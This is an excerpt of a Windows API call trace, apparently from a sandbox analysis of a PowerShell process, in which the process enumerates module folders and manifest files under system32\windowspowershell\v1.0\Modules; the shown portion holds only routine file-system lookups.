	[0046.891] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.dll")) returned 0xffffffff
	[0046.891] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52
	[0046.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.891] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.891] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52
	[0046.891] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53
	[0046.891] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7620
	[0046.891] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.892] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.892] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.892] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.892] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.892] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.892] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.892] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.893] FindClose (in: hFindFile=0x1505fab7620 | out: hFindFile=0x1505fab7620) returned 1
	[0046.893] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20
	[0046.893] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7620
	[0046.894] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.894] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.894] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.894] FindClose (in: hFindFile=0x1505fab7620 | out: hFindFile=0x1505fab7620) returned 1
	[0046.894] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51
	[0046.894] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8100
	[0046.895] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.895] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.895] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.895] FindClose (in: hFindFile=0x1505fab8100 | out: hFindFile=0x1505fab8100) returned 1
	[0046.897] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7860
	[0046.897] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.897] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.897] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.897] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0046.898] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8640
	[0046.898] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.899] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.899] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.899] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.899] FindClose (in: hFindFile=0x1505fab8640 | out: hFindFile=0x1505fab8640) returned 1
	[0046.899] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50
	[0046.899] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab82e0
	[0046.899] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.900] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.900] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.900] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.900] FindClose (in: hFindFile=0x1505fab82e0 | out: hFindFile=0x1505fab82e0) returned 1
	[0046.900] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7bc0
	[0046.900] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.901] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.907] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.907] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.907] FindClose (in: hFindFile=0x1505fab7bc0 | out: hFindFile=0x1505fab7bc0) returned 1
	[0046.908] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7380
	[0046.908] FindNextFileW (in: hFindFile=0x1505fab7380, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.908] FindNextFileW (in: hFindFile=0x1505fab7380, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.908] FindNextFileW (in: hFindFile=0x1505fab7380, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.908] FindClose (in: hFindFile=0x1505fab7380 | out: hFindFile=0x1505fab7380) returned 1
	[0046.908] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7b60
	[0046.909] FindNextFileW (in: hFindFile=0x1505fab7b60, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.909] FindNextFileW (in: hFindFile=0x1505fab7b60, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.909] FindNextFileW (in: hFindFile=0x1505fab7b60, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.909] FindClose (in: hFindFile=0x1505fab7b60 | out: hFindFile=0x1505fab7b60) returned 1
	[0046.909] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d
	[0046.909] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.909] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d
	[0046.909] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", lpFilePart=0x0) returned 0x4e
	[0046.909] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7b00
	[0046.910] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.910] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.910] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.910] FindClose (in: hFindFile=0x1505fab7b00 | out: hFindFile=0x1505fab7b00) returned 1
	[0046.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.910] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1")) returned 0x20
	[0046.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.911] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a
	[0046.911] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b
	[0046.911] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7ce0
	[0046.912] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.912] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.912] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.912] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.912] FindClose (in: hFindFile=0x1505fab7ce0 | out: hFindFile=0x1505fab7ce0) returned 1
	[0046.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.913] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a
	[0046.913] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b
	[0046.913] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab84c0
	[0046.913] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.913] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.913] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.913] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.913] FindClose (in: hFindFile=0x1505fab84c0 | out: hFindFile=0x1505fab84c0) returned 1
	[0046.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.914] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a
	[0046.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.914] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.914] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a
	[0046.914] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b
	[0046.914] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7860
	[0046.914] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.914] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.915] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.915] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.915] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0046.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.915] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1")) returned 0x20
	[0046.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.915] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38
	[0046.915] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39
	[0046.915] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab72c0
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.917] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.918] FindNextFileW (in: hFindFile=0x1505fab72c0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.918] FindClose (in: hFindFile=0x1505fab72c0 | out: hFindFile=0x1505fab72c0) returned 1
	[0046.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.919] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38
	[0046.919] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39
	[0046.919] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8280
	[0046.920] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.920] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.920] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.920] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.921] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
